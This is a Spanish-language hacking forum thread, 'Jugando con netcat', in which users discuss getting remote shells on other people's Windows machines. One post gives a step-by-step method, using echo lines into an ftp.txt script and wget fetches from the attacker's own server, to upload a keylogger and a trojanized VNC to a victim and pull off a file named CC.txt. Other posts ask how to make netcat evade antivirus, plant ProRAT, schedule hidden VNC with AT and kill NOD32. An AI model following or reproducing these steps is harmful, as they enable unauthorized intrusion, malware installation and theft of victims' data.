Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

D4RIO

Jeje, eso de los Lammers es cierto, siempre andan afamando para mal el nombre de Hacker ¡Son un peligro para la sociedad!
Lo del ipconfig, a ver, yo hice ipconfig /all en mi máquina y me pasa ésto:

Configuración IP de Windows

        Nombre del host . . . . . . . . . : fox-trot-1
        Sufijo DNS principal  . . . . . . :
        Tipo de nodo. . . . . . . . . . . : híbrido
        Enrutamiento habilitado. . . . . .: No
        Proxy WINS habilitado. . . . .    : No

Adaptador Ethernet Conexión de área local          :

        Estado de los medios. . . .: medios desconectados
        Descripción. . . . . . . . . . .  : Realtek RTL8139/810x Family Fast Ethernet NIC
        Dirección física. . . . . . . . . : 00-53-45-00-00-00

Adaptador Ethernet Conexión de área local 2          :

        Sufijo de conexión específica DNS :
        Descripción. . . . . . . . . . .  : SpeedTouch(tm) USB ADSL RFC1483
        Dirección física. . . . . . . . . : 00-53-45-00-00-00
        DHCP habilitado. . . . . . . . .  : No
        Autoconfiguración habilitada. . . : Sí
        Dirección IP de autoconfiguración : 169.254.230.167
        Máscara de subred . . . . . . . . : 255.255.0.0
        Puerta de enlace predeterminada   :

Adaptador PPP speedy               :

        Sufijo de conexión específica DNS :
        Descripción. . . . . . . . . . .  : WAN (PPP/SLIP) Interface
        Dirección física. . . . . . . . . : 00-53-45-00-00-00
        DHCP habilitado. . . . . . . . .  : No
        Dirección IP. . . . . . . . . . . : 201.255.79.179
        Máscara de subred . . . . . . . . : 255.255.255.255
        Puerta de enlace predeterminada   : 201.255.79.179
        Servidores DNS . . . . . . . . . .: 200.51.212.7
                                            200.51.211.7

        NetBios sobre TCPIP. . . . . . .  : Deshabilitado



Fijate que en Direccion de IP y Puerta de enlace predeterminada está mi IP externa real 201.255.79.179 que es la que me sale en whatismyip.com
A demás dice algo interesante en la última línea, el estado de NetBios sobre TCPIP ;D En realidad es cosa de leerlo, porque al proncipio dice configuración de IP de Windows, esa no me interesa, las de area local tampoco a menos que tenga acceso a la red LAN a la que pertenece la persona, luego si tengo lo que me interesa...
Lo de netcat me sigue sonando raro, porque los antivirus por defecto tienen casi todos la detección de Riskware y Hacktools activada, pero no se, nunca probé con otro que no sea AVS y últimamente casi ni lo uso, lo tengo ahi apagadito...BYE!
OpenBSDFreeBSD

R41N-W4R3



  A mi la parte que tienes tu de Adaptador PPP....   con toda esa info no me sale. Sabes pq puede ser???  Solo tengo la config de los ethernet conexion areal local....   

   Asia

CrashIIX

Como le puedo subir cosas con el http files server, tengo ya la shell, y la ip, y todo, solo quiero saber como subirle algo con ese programa¿?

D4RIO

Hola, respecto a lo de ipconfig fijate de estar poniendo ipconfig /all y no ipconfig solo.
Este es el md5 de mi ipconfig.exe en system32:

3FCA8365C8843DA4B2401347F272006E

fijate si el tuyo es el mismo, sino es porque tenes otro ipconfig, en ese caso te lo podés descargar...o copiar ;)

Con respecto a el http file server...no lo conozco bien, pero se que lo que tenes que hacer es crear la estructura de carpetas que querés compartir y despues la arrastras a la ventana del hfs...después en la máquina del otro tenés que descargar los archivos por http, o sea con el navegador, en si es lo mismo que poner los archivos en cualquier servidor web. Podés hacer que se descarguen directamente con un programita que podés hacer en VB o AutoIt, yo prefiero el último por temas de velocidad...
OpenBSDFreeBSD

WHK

#174
Hola a todos nuevamente...

CitarComo le puedo subir cosas con el http files server, tengo ya la shell, y la ip, y todo, solo quiero saber como subirle algo con ese programa¿?

Lo mostré en otros post y creo que acá también... puedes usar directamente un FTP para adjuntar el wget a tu shell y con el HFS hacer las transferencias de archivos... ¿Como se hace?... Facil mi querido watson:

Todos los windows NT tienen el comando FTP por defecto el cual sirve para transferir archivos y de eso nos aprobecharemos nosotros.

Sube y baja archivos desde tu shell

Primero bajamos el serveru que está en http://512.iespana.es/vnc

Ahora lo instalamos y copiamos los archivos "KEY.OLD" y "SERV-U.INI" dentro de "C:\Archivos de programa\Serv-U"

Luego lo abrimos y lo configuramos de la siguiente manera...



Vamos a Setup/Users



1. Donde dice "username" pones tu nick (yo le puse yan)
2. Donde dice "group name" no interesa mucho asi que ponle el nombre que se te ocurra
3. Donde dice "password" ponle una contraseña para el (cualquiera, pero que no se te olvide)
4. Donde dice "Home directory" pon la ruta en donde descargarás y subiras los archivos (yo le puse mi escritorio pero si eres nuevo puedes ponerle C:\ y trabajar en esa carpeta) todo lo que subas o lo que necesites subir deve quedar en esa carpeta.
5. Donde dice "notes" ponle lo que sea.
6. Luego vamos abajo donde dice "Add" y buscamos la misma carpeta que elegimos en el paso numero 4 (home directory).
7. Ahora seleccionamos las casillas que se muestran en la imagen para que nos permita subir y bajar archivos.
8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt     (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt     (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:

echo GET keylogger.exe >> ftp.txt
echo GET WinVNC4.exe >> ftp.txt
echo PUT CC.txt >> ftp.txt

Recordar que es solo un ejemplo.

Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...

Hay una manera mucho mas sencilla y algo diferente...
Puedes adjuntar el wget.exe con tu netcat o bajarlo desde tu ftp. El Wget funciona de la siguiente manera:



Como mostyré en esta imagen en el primer post.. Primero Debes abrir el HFS (es un mini servidor web que te permitirá compartir tus archivos y bajarlos con tu wget.

Descarga HFS
Descargar WGET


Por ejemplo arrastras tu archivo hasta la ventanita del HFS y copias el link que aparece arriba y lo pegas en tu shell de la siguiente manera:

WGet.exe -c -t0 http://www.paginaaqui.com/ARCHIVOAQUI.exe

y cuando presiones ENTER verás que bajaste tu archivo muy rápidamente desde tu HFS. Esto es un poco mas eficiente y rápido que usar FTP... una alternativa de muchas otras.

Nota: en el video de troyanizando RealVNC se ve como subirlo de esta manera ( http://512.iespana.es/vnc ).

lAl

hola... pues tengo una duda y realmente si se burlan de mi pues no importa prefiero verme tonto preguntando y no ser un tonto por no preguntar...

bueno pues puse el netcat a la escucha y lo probe en una pc de una red familiar y funciono.. pero despues le mande el archivo que cree con el winrar el .sfx a otro amigo para que lo ejecutara, puse el netcat a la escucha y nada, no se si por que me tenga que saltar el firewall o el puerto que puse no este avierto(puerto 80) pero me imagino que si por que es el que las pc tiene abierto por default ...sino pues a conseguir su ip mediante ing. inversa y hacerle una escaneada con el Nmap para ver que puertos tiene abiertos... espero me ayuden y me saquen de mis dudas... ;D

Crwy

#176
Me han surgido varias dudas, 1 ene l video q me baje se ve como solo usas un arxivo llamado nc.exe, pro yo me bajao 2 el cliente y el servidor. Cual debo usar? ando perdido



Saludos  :huh: :huh:
Pelearé hasta el último segundo y mi epitafio será: No estoy de acuerdo.

pitufooo

#177
hola d nuevo.

por mas k lo intento NO consigo hacer k no me detecte me Norton al Netcat.

Siempre k lo subo al pc victima salta noirton y m lo borra al tiempo k saca su mensajito de se ha encontrado un virus.

He probado haciendo lo del primer post , pero no me sale siempre me pilla norton, tambien he probado con panda y mas d lo mismo.

Por favor podriais enseñarme como hacerlo indetectable.

muchas gracias

un saludo

PD  hay alguna otra forma de conseguir una shell  remota ??

carlipus

#178
Buenas, he conseguido una shell, y por ftp le he subido los 4 archivos que pone en el manual para conectar por Winvnc, peroo hay una cosa que no entiendo. y es cuando pongo at "la hora" /interactive "qttask.exe"

Una vez pasa la hora y pongo el comando at para ver si ya no hay entradas, sigue estando la entrada esa que puse, por que?  Espero haberme explicado bien, y si nos lo intento explicar mejor.

si pongo tasklist me sale el qttask.exe pero voy al cliente de winvnc. pongo la ip, y me pone: Invalid VNC server specified. Server should be of the form host:display

Saludos.

carlipus

#179
Hola de nuevo, he conseguido shell de nuevo de un amigo y le hize todos los pasos para subirle vnc, incluido los comandos AT tambien bien. pero cuando voy a abrir el vnc me pone siempre el mismo error-> Invalid VNC server specified. Server should be of the form host:display

no tiene router, pero nose xq me pone eso!


Y otra cosa que intento es meterle el troyano prorat, pero el antivirus me lo elimina...y no pudo quitar el nod32 con tasskill!

saludos